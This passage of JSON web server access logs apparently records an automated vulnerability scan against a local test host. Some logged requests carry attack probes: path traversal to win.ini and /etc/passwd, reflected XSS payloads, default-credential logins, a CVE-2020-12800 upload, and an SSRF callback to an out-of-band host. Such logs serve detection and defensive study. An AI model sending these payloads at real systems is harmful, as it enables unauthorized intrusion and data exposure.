"http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/get_device_details HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1/assets/base/home.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5Cwindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jsp/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.dev.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"\x0D\x0A\x0D\x0A login\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A testing\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A testing\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hp/device/DeviceInformation/View HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/cores?wt=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/.env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nbproject/project.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/V1/store/storeConfigs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /getFavicon?host=http://ca281d8smpvb9r2g07h0oj9phmyb8obn8.oast.site HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/install HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose-dev.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-----------------------------350278735926454076983690555601\x0D\x0AContent-Disposition: form-data; name=\x22supported_type\x22\x0D\x0A\x0D\x0Atxt%\x0D\x0A-----------------------------350278735926454076983690555601\x0D\x0AContent-Disposition: form-data; name=\x22size_limit\x22\x0D\x0A\x0D\x0A5242880\x0D\x0A-----------------------------350278735926454076983690555601\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Adnd_codedropz_upload\x0D\x0A-----------------------------350278735926454076983690555601\x0D\x0AContent-Disposition: form-data; name=\x22type\x22\x0D\x0A\x0D\x0Aclick\x0D\x0A-----------------------------350278735926454076983690555601\x0D\x0AContent-Disposition: form-data; name=\x22upload-file\x22; filename=\x2229K9NK5iNivT3101TILhwOqNHmC.txt%\x22\x0D\x0AContent-Type: application/x-httpd-php\x0D\x0A\x0D\x0ACVE-2020-12800-29K9NK5iNivT3101TILhwOqNHmC\x0D\x0A-----------------------------350278735926454076983690555601--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=cf7skins&tab=%27%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webclient/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/Version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /info/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"loginUsername=admin&loginPassword=axis2","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /axis2-admin/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/V1/store/storeViews HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/29K9NK5iNivT3101TILhwOqNHmC.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /concrete5/index.php/install HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /him/api/rest/V1.0/system/log/list?filePath=../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.override.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/vkeyboard/vkeyboard.php?passformname=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /community/?foro=signin&redirect_to=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/status/flags HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/latest/serverInfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"userName=admin&password=axis2&submit=+Login+","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /axis2/axis2-admin/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E]= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /en-US/account/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": 